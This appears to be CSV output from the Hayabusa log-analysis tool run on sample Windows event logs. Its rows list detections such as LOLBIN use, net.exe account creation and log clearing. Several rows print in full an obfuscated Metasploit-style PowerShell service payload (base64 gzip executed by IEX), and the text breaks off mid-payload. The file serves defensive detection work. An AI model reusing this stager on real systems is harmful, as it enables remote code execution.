/Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x11c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:02:21.475 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x720 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:02:28.413 +00:00,IE10Win7,4688,medium,Persis,Net.exe User Account Creation,,rules/sigma/process_creation_builtin/proc_creation_win_net_user_add.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:02:28.413 +00:00,IE10Win7,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:02:28.428 +00:00,IE10Win7,4688,medium,Persis,Net.exe User Account Creation,,rules/sigma/process_creation_builtin/proc_creation_win_net_user_add.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:02:28.428 +00:00,IE10Win7,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:02:49.100 +00:00,IE10Win7,4688,medium,Persis,Net.exe User Account Creation,,rules/sigma/process_creation_builtin/proc_creation_win_net_user_add.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:02:49.100 +00:00,IE10Win7,4688,medium,Persis,Net.exe User Account Creation,,rules/sigma/process_creation_builtin/proc_creation_win_net_user_add.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:02:49.100 +00:00,IE10Win7,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:02:49.100 +00:00,IE10Win7,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:03:25.976 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x824 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:03:26.007 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:03:26.054 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:05:56.789 +00:00,IE10Win7,4688,medium,Persis,Net.exe User Account Creation,,rules/sigma/process_creation_builtin/proc_creation_win_net_user_add.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:05:56.789 +00:00,IE10Win7,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:05:56.804 +00:00,IE10Win7,4688,medium,Persis,Net.exe User Account Creation,,rules/sigma/process_creation_builtin/proc_creation_win_net_user_add.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:05:56.804 +00:00,IE10Win7,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:21:12.500 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:54:49.500 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xc60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:54:49.500 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 15:03:32.500 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 15:10:43.213 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x72c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 15:10:56.112 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 15:10:56.268 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xaf4 | User: IEUser | LID: 0x6796c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 15:10:56.315 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xad8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 15:10:56.331 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa30 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 15:10:56.346 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1a8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 15:10:56.377 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xd08 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 15:45:12.871 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb34 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 15:45:18.574 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8d4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 15:45:25.147 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x270 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 15:46:27.941 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc90 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 15:46:32.738 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 16:33:53.404 +00:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:34:04.272 +00:00,IE10Win7,104,high,Evas,System Log File Cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-20 16:35:46.590 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-20 16:35:46.590 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-20 16:35:46.590 +00:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-20 16:35:46.605 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1